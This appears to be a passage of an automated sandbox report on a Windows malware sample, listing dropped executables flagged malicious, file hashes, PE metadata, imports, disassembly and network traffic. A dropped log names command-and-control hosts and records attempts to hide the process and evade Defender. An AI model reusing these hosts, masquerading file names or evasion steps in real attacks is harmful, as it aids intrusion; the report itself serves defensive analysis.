Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	6.31266455792162
Encrypted:	false
SSDEEP:	3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
MD5:	D98E33B66343E7C96158444127A117F6
SHA1:	BB716C5509A2BF345C6C1152F6E3E1452D39D50D
SHA-256:	5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
SHA-512:	705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 73%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................\|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001YS (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11027387102746783
Encrypted:	false
SSDEEP:	12:26hzXm/Ey6q9995Ffsq3qQ10nMCldimE8eawHjc2i:26Ml68rZLyMCldzE9BHjcb
MD5:	59780508EC9D4F0D75A06B5CD8FDB782
SHA1:	7908F113274A3C5D2BA954AB1E914E5F73B66609
SHA-256:	9D15CA570CBA2201A2AA89A0757D23761054BDEB4EA7C69F50FECBE4998D4D14
SHA-512:	B7C95BC2C0B513E7007F8FFB008A54ABDD07B83BCDE6615811E84CAEA2FB8B761299AC7EB871AE12D365BE726B2ADDF5D631BB38E1D7486FFB272203133667DD
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................)........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .....6..z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........".......................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1127826807463711
Encrypted:	false
SSDEEP:	12:KXm/Ey6q9995FfSTw1miM3qQ10nMCldimE8eawHza1miIQcE:/l68rSk1tMLyMCldzE9BHza1tIQZ
MD5:	212C7C49EC89D181D5A4009E8FB0CC8F
SHA1:	1332ABD28D67B9F97A94923F626D8D381D07A218
SHA-256:	87175704C0ED1C2564DBD4D91C9D150DC89AF92654A30AB2ADC8AC7B4258FC50
SHA-512:	A1D3672051A1CC05606B363D039D8D6FDD6F55BA1A1BE2A7CF7D06C594CE3D8EC7772762682DF7A8410974E3FB6009A1BBC72FA446A0DC84998FFB4C8943BFB6
Malicious:	false
Reputation:	unknown
Preview:	.................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .......~z............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........%.......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11264829878785992
Encrypted:	false
SSDEEP:	12:fXm/Ey6q9995FfIg1mK2P3qQ10nMCldimE8eawHza1mK/N:Ol68rIg1iPLyMCldzE9BHza17N
MD5:	8CA0CDD2FB3FA75BED06C9ABD3277C05
SHA1:	8493F6EA64D776A0CBD50BF83D3ADA5AEEF65AAF
SHA-256:	4F408F9E3A5C7550BE4DFC4E74BD8325E8FB347BD2D7A29E235F5EF0E9EC8FFD
SHA-512:	76E671DF103A3171048058E6B6A93B182F38C19B957D8DD347A1617748ADF60EBF9334F6DABC0BD74E3AEB69AE5CAAD1C7E411157BBD1CBC011820370AA6A8CB
Malicious:	false
Reputation:	unknown
Preview:	.........................................................................................6.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... ......Iwz............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........@......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Logs\CBS\CBS.log Download File
Process:	C:\Windows\servicing\TrustedInstaller.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	3080192
Entropy (8bit):	5.314130349771336
Encrypted:	false
SSDEEP:	6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
MD5:	CA1379F5BBD36FFAAF5163A464309B78
SHA1:	6927C04A2725CA246A9DD9EDA85504C38DB76394
SHA-256:	3584011B777E2BBA89A633353F83384AD8EBC3FCDDC51579BCB42B0AA885F14B
SHA-512:	5B93BB83E047CC420FF5FF89264F3EBFE69277894616841F4C0F72CD2D6FF5F0BB8450DE8E6C6C70EFE17F4A2A46076372BEFB3A305EA78AD1D243E45728232E
Malicious:	false
Reputation:	unknown
Preview:	.2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211111_095702_651.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.381558405825923
Encrypted:	false
SSDEEP:	96:oCF2o+HP5FT9Y2Y6FCoUSI2lZvkn94KJHT28YFz2UMCF6JRxY52:7UvnKoS2bA3bCeT
MD5:	11889C6C1D894417EFAB47A9FDBF21C6
SHA1:	543D24874BB616353A923E4CD0BA6C4325C457E9
SHA-256:	561D50A8E282FEEAFC45C26EF5B9052DD4E3CF205CC16758DDD90A3BAEE1D126
SHA-512:	988C0C9DBF7E711BFB036A8E4EC0711DD6BE1D7DE36D62C3C58D1683489D5BF1D8114EDAD51191B16A0151FC5DDA05E8813473DB14929D7C7D529D3B3DB15256
Malicious:	false
Reputation:	unknown
Preview:	.... ... ....................................... ...!...........................\.......MJ.......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......\|.y............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.1.1._.0.9.5.7.0.2._.6.5.1...e.t.l.........P.P.\.......MJ......................................................................................................................................................................................................................................................................

C:\Windows\rss\csrss.exe Download File
Process:	C:\Users\user\Desktop\4t4y4r89UZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4520488
Entropy (8bit):	7.954926052042642
Encrypted:	false
SSDEEP:	98304:wymevTOPXdqwIzrd1I8FM2Cmg1yX/EdY8Pfk7KqDgJGNv04+ASYD:VmaaPXdqwzyvUYzgJyMQD
MD5:	14C0D8425930CCEC0566B04864A05670
SHA1:	07FD6746417C89239E8B4B272FA350C5DC41C580
SHA-256:	FEA538EFF5BC9CD3970EDDA4B3DDFA0E72505B01DC207E47D8112074720FA05E
SHA-512:	12E0FE096E8E8FB54C3C820580EE1EF536F0A6BD014C057FDE4263F1DE643D0E51D27850AE6DEF83C013FFB49F02699A651D0B422A5FB7C396CCB961ADAE5E05
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z}X.Z}X.Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}X.".X.Z}X.Z\|X$Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}XRich.Z}X........................PE..L......`.................zC...p.......A.......C...@..........................p........E......................................}C.P........@............D.(....P......@................................{A.@............................................text....yC......zC................. ..`.data...lho...C......~C.............@....rsrc....@.......B....C.............@..@.reloc.......P........C.............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\windefender.exe Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	modified
Size (bytes):	2102272
Entropy (8bit):	7.879347868736008
Encrypted:	false
SSDEEP:	49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
MD5:	E0A50C60A85BFBB9ECF45BFF0239AAA3
SHA1:	AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
SHA-256:	FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
SHA-512:	03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..\|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.\|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........

\Device\Null Download File
Process:	C:\Windows\rss\csrss.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	4.9781217303638385
Encrypted:	false
SSDEEP:	48:nv491EHNI7/AYdaAwyHHMJ2Qs0iPys0io:nvICHNI7OyHHMJ2g9F
MD5:	A557C4FDAF53B1AA77384BEFFA92661A
SHA1:	1ED645B8AA469ACEBB0A9AC34998683A600FF108
SHA-256:	0896EF145C7A6E9609420C98F98D873CD72579B8FBDA3CD159D96318E786416E
SHA-512:	D439E04A0DC5B36667D832EA54FDAC88F318D1FC9A592427EDE1474FE79D16583AD059F5C651E16E968B039CE8E130999D841044AFD9BAFF9CA3041A729F8FE7
Malicious:	false
Reputation:	unknown
Preview:	2021/11/11 01:57:24 servers count 16.2021/11/11 01:57:24 logs endpoint https://runmodes.com/api/log.2021/11/11 01:57:24 initial server https://server8.trumops.com.2021/11/11 01:57:24 first install, ignore discover on start.2021/11/11 01:57:24 default browser ChromeHTML.2021/11/11 01:57:28 before EfiGuard.2021/11/11 01:57:29 poll response body {"signature":"5745c2e019f85235cbd094aa07f8f24e47db8c0cbdffc6471a50bc49778724d141f4e71bee8b87e0c37930934dfae49063d3b4db5a88b42f150bfc10bf1ca10f"}.2021/11/11 01:57:29 poll signature verified 5745c2e019f85235cbd094aa07f8f24e47db8c0cbdffc6471a50bc49778724d141f4e71bee8b87e0c37930934dfae49063d3b4db5a88b42f150bfc10bf1ca10f.2021/11/11 01:57:34 reboot in 1s.2021/11/11 01:57:35 rebooting now.2021/11/11 01:57:40 failed to hide app: unacceptable PGDSE state: 65.2021/11/11 01:57:43 couldn't exclude temp defender: couldn't create device: The system cannot find the file specified..2021/11/11 01:57:43 service is not running.2021/11/11 01:57:43 service needs an up

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.954926052042642
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4t4y4r89UZ.exe
File size:	4520488
MD5:	14c0d8425930ccec0566b04864a05670
SHA1:	07fd6746417c89239e8b4b272fa350c5dc41c580
SHA256:	fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
SHA512:	12e0fe096e8e8fb54c3c820580ee1ef536f0a6bd014c057fde4263f1de643d0e51d27850ae6def83c013ffb49f02699a651d0b422a5fb7c396ccb961adae5e05
SSDEEP:	98304:wymevTOPXdqwIzrd1I8FM2Cmg1yX/EdY8Pfk7KqDgJGNv04+ASYD:VmaaPXdqwzyvUYzgJyMQD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z}X.Z}X.Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}X.".X.Z}X.Z\|X$Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}XRich.Z}X........................PE..L......`...

File Icon


Icon Hash:	aedaae9ecea62aa2

Static PE Info

General
Entrypoint:	0x8182e0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x6000B185 [Thu Jan 14 21:03:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	5bf1109d17f31fdf1287dd3cc8a8bd45

Authenticode Signature

Signature Valid:	false
Signature Issuer:	PostalCode=10305
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	11/10/2021 3:53:02 PM 11/10/2022 3:53:02 PM
Subject Chain	PostalCode=10305
Version:	3
Thumbprint MD5:	046EBB0A0FBFD4C2F85D5511A00C769B
Thumbprint SHA-1:	0A6F3BEB4B81C6E4791C511DE34E6484277B1D99
Thumbprint SHA-256:	D8B14DB5B868297FF5FBB14E701E1A2674EBD36F51FA5751C34DBF9A74D14A8A
Serial:	43071B451406BB75C591CD4F54C74219

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F5E6880913Bh
call 00007F5E68805156h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 008377B0h
push 0081A7F0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00839404h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401088h]
cmp dword ptr [02F2E868h], 00000000h
jne 00007F5E68805150h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401104h]
call 00007F5E688052D3h
mov dword ptr [ebp-6Ch], eax
call 00007F5E6880CB0Bh
test eax, eax
jne 00007F5E6880514Ch
push 0000001Ch
call 00007F5E68805290h
add esp, 04h
call 00007F5E6880C468h
test eax, eax
jne 00007F5E6880514Ch
push 00000010h
call 00007F5E6880527Dh
add esp, 04h
push 00000001h
call 00007F5E6880C3B3h
add esp, 04h
call 00007F5E6880A1CBh
mov dword ptr [ebp-04h], 00000000h
call 00007F5E68808B5Fh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x437ddc	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2b30000	0x40c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x44f200	0x828	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2b35000	0x1aac	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1240	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x417b10	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1e8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x437988	0x437a00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x439000	0x26f686c	0x1600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2b30000	0x40c8	0x4200	False	0.719696969697	data	6.2674119958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2b35000	0x11bc8	0x11c00	False	0.0812747579225	data	1.04753991658	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2b30240	0x25a8	data	Spanish	Paraguay
RT_ICON	0x2b327e8	0x10a8	data	Spanish	Paraguay
RT_STRING	0x2b33ad0	0x150	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x2b33c20	0x252	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x2b33e78	0x24e	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x2b33920	0x88	data	Divehi; Dhivehi; Maldivian	Maldives
RT_ACCELERATOR	0x2b338b8	0x68	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x2b33890	0x22	data	Spanish	Paraguay
RT_VERSION	0x2b339a8	0x128	data	Divehi; Dhivehi; Maldivian	Maldives

Imports

DLL	Import
KERNEL32.dll	_lwrite, InterlockedDecrement, SetFirmwareEnvironmentVariableA, GetNamedPipeHandleStateA, SetHandleInformation, SetConsoleScreenBufferSize, CancelWaitableTimer, SetVolumeMountPointW, FindFirstFileExW, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, ReadConsoleW, GetSystemWow64DirectoryA, QueryActCtxW, CreateActCtxW, GetSystemTimes, ActivateActCtx, GlobalAlloc, GlobalFindAtomA, LoadLibraryW, ReadConsoleInputA, SizeofResource, GetSystemWindowsDirectoryA, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, GetModuleFileNameW, GetSystemDirectoryA, SetDllDirectoryW, GetStartupInfoW, VerifyVersionInfoW, GetLastError, IsDBCSLeadByteEx, SetLastError, GetProcAddress, CreateNamedPipeA, IsValidCodePage, CopyFileA, GlobalGetAtomNameA, SearchPathA, GetPrivateProfileStringA, OpenWaitableTimerA, WritePrivateProfileStringA, WTSGetActiveConsoleSessionId, SetConsoleCursorInfo, GetProcessShutdownParameters, BuildCommDCBA, GetCurrentDirectoryA, GetFileTime, GetVersionExA, GetWindowsDirectoryW, FileTimeToLocalFileTime, TlsFree, GetProfileSectionW, CommConfigDialogW, LocalFileTimeToFileTime, CompareStringW, TlsGetValue, DeleteFileA, GetCommandLineA, HeapSetInformation, EnterCriticalSection, LeaveCriticalSection, DecodePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, IsProcessorFeaturePresent, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, InterlockedIncrement, ExitProcess, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, IsBadReadPtr, TlsAlloc, TlsSetValue, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, RaiseException, SetFilePointer, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, FlushFileBuffers, GetStringTypeW, LCMapStringW, MultiByteToWideChar, SetStdHandle, CloseHandle, CreateFileW
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits

Version Infos

Description	Data
Translations	0x0522 0x023c

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2021 01:57:25.943613052 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:25.943671942 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:25.943871021 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:25.945086956 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:25.945138931 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:25.964384079 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:25.964432955 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:25.964845896 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:25.982342005 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:25.982398987 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:25.999628067 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.003365040 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.003417969 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.003964901 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.003978968 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.005194902 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.005275011 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.007180929 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.007272005 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.007390976 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.007416010 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.031532049 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.051395893 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.051424980 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.051947117 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.051958084 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.053608894 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.053714991 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.056186914 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.056385040 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.056508064 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.056524038 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.056696892 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.056740999 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.056823969 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.057049036 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.057106972 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.057228088 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.057243109 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.057414055 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.057426929 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.057538986 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.057553053 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.057574987 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.057651997 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.057811975 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.057845116 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.057866096 CET	49747	443	192.168.2.3	104.21.34.203
Nov 11, 2021 01:57:26.057879925 CET	443	49747	104.21.34.203	192.168.2.3
Nov 11, 2021 01:57:26.223285913 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.223500967 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.223634958 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.224770069 CET	49748	443	192.168.2.3	104.21.79.9
Nov 11, 2021 01:57:26.224818945 CET	443	49748	104.21.79.9	192.168.2.3
Nov 11, 2021 01:57:26.224838972 CET	49748	443	192.168.2.3	104.21.79.9
